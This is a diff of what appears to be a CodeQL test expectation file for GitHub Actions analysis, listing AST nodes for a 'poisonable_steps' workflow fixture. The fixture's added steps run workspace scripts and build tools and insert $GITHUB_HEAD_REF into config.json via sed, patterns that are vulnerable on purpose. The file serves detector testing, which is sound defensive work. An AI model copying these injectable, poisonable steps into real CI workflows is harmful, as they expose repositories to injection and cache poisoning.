bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ 
github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | 
@@ -191,7 +213,18 @@ runStepChildren | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" 
config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | 
@@ -344,94 +377,138 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| 
.github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | 
.github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . 
venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . 
venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| 
.github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| 
.github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | 
.github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | 
.github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| 
.github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css 
| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | 
.github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | 
